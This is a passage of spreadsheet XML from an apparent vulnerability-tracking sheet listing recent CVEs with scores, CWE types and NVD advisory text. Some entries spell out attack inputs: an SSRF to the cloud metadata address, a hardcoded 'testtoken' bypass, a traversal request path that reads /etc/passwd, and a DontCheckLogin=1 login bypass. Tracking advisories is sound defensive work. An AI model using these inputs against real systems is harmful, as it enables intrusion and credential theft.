      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S212" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel module through which an attacker might initiate an out-of-bounds read. Successful exploitation of this issue could lead to denial of service and information disclosure.</t>
        </is>
      </c>
      <c r="T212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47576</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100262</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="inlineStr"/>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S213" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18991 missing authorisation allowed users with read-only project access to overwrite project notification templates</t>
        </is>
      </c>
      <c r="T213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100262</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19553</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>cna@python.org</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="inlineStr"/>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="S214" s="5" t="inlineStr">
        <is>
          <t>ssl.SSLContext.wrap_bio() didn't require the server_hostname argument
to not be None if ssl.SSLContext.check_hostname was set. Due to a
missing parameter check in SSLObject, if the server_hostname argument
isn't supplied then hostname verification would be silently skipped.
This defect could lead to programs where certificate hostname verification
*appeared* to be succeeding with SSLContext.check_hostname = True and no
ValueError being raised due to misconfiguration.
If the program passes a server_hostname value that isn't an empty string
or None to any of these APIs then certificate hostname verification
proceeds as expected and the program is not affected by this vulnerability.
Mitigating this vulnerability doesn't require updating Python or applying
the patch. To mitigate, pass a valid non-None and non-empty
server_hostname value to SSLContext.wrap_bio(),
asyncio.create_connection(), or asyncio.loop.start_tls() and
certificate hostname verification will proceed as expected. Upgrading to
the latest version of Python or applying the patch only changes the
behavior from silently skipping hostname verification to raising a
ValueError, similar to SSLContext.wrap_socket(), when server_hostname
isn't supplied.</t>
        </is>
      </c>
      <c r="T214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19553</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55177</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="inlineStr"/>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr">
        <is>
          <t>tempo, requests</t>
        </is>
      </c>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S215" s="5" t="inlineStr">
        <is>
          <t>CloudTAK is a browser-based Common Operating Picture and situational awareness tool compatible with TAK. Prior to version 13.10.0, every route in the ESRI helper family (api/routes/esri.ts) takes a fully attacker-controlled URL from the request (POST /api/esri body url, and the portal / server / layer query parameters on the GET /api/esri/* routes) and passes it into EsriBase / EsriProxyPortal / EsriProxyServer / EsriProxyLayer in api/lib/esri.ts, which fetch it with the bare fetch from @tak-ps/etl. No IP / DNS / hostname classification is applied at any point, so the destination is never validated against private, loopback, or link-local ranges. Any authenticated user (the routes only require Auth.is_auth(config, req, { anyResources: true }), i.e. any token, not an admin) can therefore make the CloudTAK server issue arbitrary outbound GET/POST requests to internal addresses such as the cloud instance-metadata service (169.254.169.254), loopback admin ports (127.0.0.1:&lt;port&gt;), and other hosts reachable only from inside the deployment VPC. This is a full-read SSRF, not blind: on success the upstream JSON body is returned to the caller via res.json(...), and on failure the upstream error string is reflected verbatim as ESRI Server Error: &lt;message&gt;. An attacker can read cloud metadata (and the temporary IAM credentials the instance role exposes), enumerate internal services, and exfiltrate their response bodies. The sniff() URL classifier provides no protection: it only pattern-matches the pathname (/rest, /arcgis/rest, /sharing/rest), so a URL like http://169.254.169.254/arcgis/rest or http://127.0.0.1:8500/rest passes sniff() and is fetched. This issue has been patched in version 13.10.0.</t>
        </is>
      </c>
      <c r="T215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55177</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62085</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr"/>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S216" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in WP Activity Log &lt;= 5.6.6 versions.</t>
        </is>
      </c>
      <c r="T216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62085</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62097</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="inlineStr"/>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S217" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPTasty Business Directory business-directory-plugin allows Blind SQL Injection.This issue affects Business Directory: from n/a through 6.4.27.</t>
        </is>
      </c>
      <c r="T217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62097</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94082</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="inlineStr"/>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S218" s="5" t="inlineStr">
        <is>
          <t>Author SQL Injection in Quiz Cat &lt;= 3.1.1 versions.</t>
        </is>
      </c>
      <c r="T218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94082</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96345</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S219" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in Estatik &lt;= 4.3.5 versions.</t>
        </is>
      </c>
      <c r="T219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96345</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96346</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S220" s="5" t="inlineStr">
        <is>
          <t>Author SQL Injection in WP ERP &lt;= 1.17.9 versions.</t>
        </is>
      </c>
      <c r="T220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96346</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96827</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="inlineStr"/>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S221" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in Admin Notices Manager &lt;= 1.6.0 versions.</t>
        </is>
      </c>
      <c r="T221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96827</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96828</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S222" s="5" t="inlineStr">
        <is>
          <t>Administrator SQL Injection in Category Discount Woocommerce &lt;= 5.18 versions.</t>
        </is>
      </c>
      <c r="T222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96828</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54402</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S223" s="5" t="inlineStr">
        <is>
          <t>iDocView contains a server-side request forgery vulnerability in its /doc/upload endpoint that allows remote unauthenticated attackers to fetch arbitrary URLs by supplying a hardcoded default token value (testtoken) to bypass authentication. Attackers can exploit the unrestricted URL scheme handling, including file:// URIs, to read arbitrary local files such as operating-system and application configuration files, and to reach internal network hosts and services not otherwise accessible. Exploitation evidence was first observed by the Shadowserver Foundation on 2024-03-26.</t>
        </is>
      </c>
      <c r="T223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54402</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54403</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="inlineStr"/>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S224" s="5" t="inlineStr">
        <is>
          <t>Yonyou U8 CRM before V16.5 and V18 contains an arbitrary file read vulnerability in /ajax/getemaildata.php that allows unauthenticated attackers to bypass authentication using the DontCheckLogin=1 parameter and read arbitrary files via an unvalidated filePath parameter. Attackers can exploit this flaw to read sensitive files outside the web application directory, including configuration files containing database or service credentials. Exploitation evidence was first observed by the Shadowserver Foundation on 2023-10-14.</t>
        </is>
      </c>
      <c r="T224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54403</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-58387</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="inlineStr"/>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S225" s="5" t="inlineStr">
        <is>
          <t>Inspur Haiyue HCM Cloud contains an arbitrary file read vulnerability in the /api/model_report/file/download endpoint that allows unauthenticated remote attackers to read arbitrary files by supplying unvalidated path parameters index and ext. Attackers can craft requests such as /api/model_report/file/download?index=/&amp;ext=&lt;path&gt; to traverse the filesystem and disclose sensitive files including /etc/passwd, application database files, and system configuration files. Exploitation evidence was first observed by the Shadowserver Foundation on 2024-11-04 .</t>
        </is>
      </c>
      <c r="T225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-58387</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101884</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="inlineStr"/>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr">
        <is>
          <t>dotnet</t>
        </is>
      </c>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="S226" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Windows Node before 2026.7.1 contains an incomplete environment-variable sanitizer in system.run that fails to block GIT_CONFIG_*, DOTNET_STARTUP_HOOKS, and JAVA_TOOL_OPTIONS variables. Attackers with gateway or agent access can supply these variables to allowlisted tools like git, dotnet, or java to load attacker-controlled code and achieve arbitrary code execution.</t>
        </is>
      </c>
      <c r="T226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101884</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102091</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="inlineStr"/>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K227" s="5" t="inlineStr"/>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S227" s="5" t="inlineStr">
        <is>
          <t>Kiteworks Secure Data Forms before version 9.5.0 is vulnerable to Server-Side Request Forgery that could allow an unauthenticated, remote attacker to make the server issue arbitrary outbound network requests and read back the responses. This could potentially be used to reach internal-only services or other network-restricted resources.</t>
        </is>
      </c>
      <c r="T227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102091</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102128</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="inlineStr"/>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
